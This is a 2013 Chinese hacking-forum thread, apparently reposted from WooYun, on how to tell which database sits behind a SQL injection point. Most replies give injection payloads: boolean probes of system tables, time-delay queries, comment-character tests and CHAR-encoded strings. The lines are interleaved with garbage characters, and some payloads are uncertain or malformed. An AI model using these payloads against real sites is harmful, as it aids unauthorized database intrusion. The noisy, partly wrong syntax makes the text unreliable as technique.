一个注射点如何最快速确认是什么类型数据库
* B2 n+ Q! f% S! t, Y) A4 {xsser (十根阳具有长短!!) | 2013-02-05 12:36
% j/ \0 I$ z9 f3 l' w% m* b假设这么一个注射点:
5 V2 d) {1 B7 m: L8 n0 J4 ushow.html?id=2
7 ?8 U8 }/ m6 R/ omysql:id=2 and version()>0* N2 g% ?( c6 E1 h' d
oracle:id=2 and '1'||'1'='11
. M2 |0 M4 I0 Y+ q, a' t7 C其他的欢迎补充
4 b, A" p5 E6 [ w1 b1#
" G# [$ x% ]# m& e- qupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
7 z0 m7 |% o4 [' t6 v( jAccess:
/ c% E! W" {6 h" @$ l2 D4 _" t) _aNd aSc(cHr(97))=97
& J5 X) c8 c4 n+ y) C: n* _* Land exists(select id from MSysAccessObjects)
' O K a9 ?# rSQL Server:# v4 D$ ~) i" `- x
and exists(select id from sysobjects)3 l* C8 u5 A, N- M1 c0 J% ]
and length(user)>06 t/ K& s' U7 P
MySQL:
( t- M+ g8 Q7 o, V# Vand length(user())>0$ w( _3 P* H2 v% d0 ~
2#+ s. e$ E( S) ?' V$ t
xsser (十根阳具有长短!!) | 2013-02-05 12:48
/ j' @* ?! b7 D% T' m@upload 如果这些都不是呢…1 G5 T5 L* F/ H. v( L' Q
3#8 E M/ }' \/ K) M; N. M( U. O" c
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03. m5 ~8 w5 T- w
@xsser 不快速的,延时注入3 U3 Q& C7 Y: t4 ?) F
不知道这样写对不对, f% `/ A# n( Z6 }
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'0 f U( [- j4 A* Y% t% V7 f
mysql:id=2 and select benchmark(1e8,current_date());
! Y V! f- K5 b! \0 d" t4#& l1 i$ S9 z7 p" O9 K! L
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10- {$ u* X0 I' I+ j; {
最快的貌似是看报错信息
/ v% n$ g8 w5 s { horacle error' W' b, |% B8 h" X) J: B
mssql error) `4 M/ G/ ]3 L! f6 f
mysql error
" i% n" r' e% M% h0 z" F" w9 [5#
i6 z0 p6 w/ f4 r k8 S% jNimda (你们都是坏银~) | 2013-02-05 13:14
8 w% _5 w6 Z; j# J- t( {/ ^小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual) s. I. \4 g: _2 b/ y3 X5 q+ V
6#
# }5 h& @1 G+ Z' a0 s1 lupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
& r |/ {: {3 p“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
+ x! l2 S6 s) ]; z. ~! L" g a u“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:+ P; X& e0 i9 t* b
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。6 m c9 _( i5 b! l: [$ h; }5 ?% ^
7#
" P4 o7 U4 X% ?4 V6 O_Evil (HackEnd) | 2013-02-05 13:33
& ]7 g& u. [9 \1 s: J& e3 k7 t# I* RPostgreSQL
- \+ e$ w0 A: K6 h$ z8#* D. k1 d$ d4 d% R0 [* J5 z' C
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:428 p# f% _# d" v; Z! O9 n$ ^. b4 I
切换编码 and 1=14 V5 \0 Z" P L5 t+ \
oracle:9 X! f/ g- I5 Q; Q* o
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49). _: v; w+ c6 ~9 p( e
mssql:
0 G% n8 z$ y% v$ r' G6 TCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
' ^1 @+ d" g) N" K1 V4 \mysql:5 \, j9 O6 `& ?8 A3 ]9 E
CHAR(97, 110, 100, 32, 49, 61, 49). ?# j# d& G4 o1 B9 D9 T
9#( D9 K o$ P) n6 E! R0 p
xsser (十根阳具有长短!!) | 2013-02-05 14:312 Z# D/ H. b) S8 l5 L
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?0 c3 d* a& T+ L( W3 b
10#
+ E2 P" c) F0 d2 m2 A+ o1 w+ Supload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46( [. S5 {/ {5 @) O- w. J
@xsser 是奇葩数据库类型的么?
1 [1 f; J% u1 W根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述: d6 W* i! e' ~' L* K4 Y
1.是否可以使用特定的函数来判断,该数据库特有的* z, v# d3 N5 P& l
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等2 Q- K) Q- c3 E" K1 @/ I
3.是否可以编码查询% n+ q( k$ A7 o0 u
4.是否显可以利用错信息& K* ^# m4 {5 [9 }$ v# `) }, i$ J+ B
5.是否存在数据库某些特性辅助判断4 d/ S9 @) x0 R, M7 @' Z9 }
个人见解5 p: Q+ L4 x. H
11#
6 { }4 v$ c$ ]" |; T$ f% \% ^: R小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:555 r% X& T0 s6 J1 L1 K: X
已收藏,mssql可以直接看到错误提示的吧~
W. G4 f; g' W/ u) \, R" W$ `12#" ~8 v2 z! d) A1 o, R
Passer_by | 2013-02-05 15:097 @ ~# H4 z6 x* }- N, g4 M$ k
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。+ Q9 p. n5 Z7 O( S
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对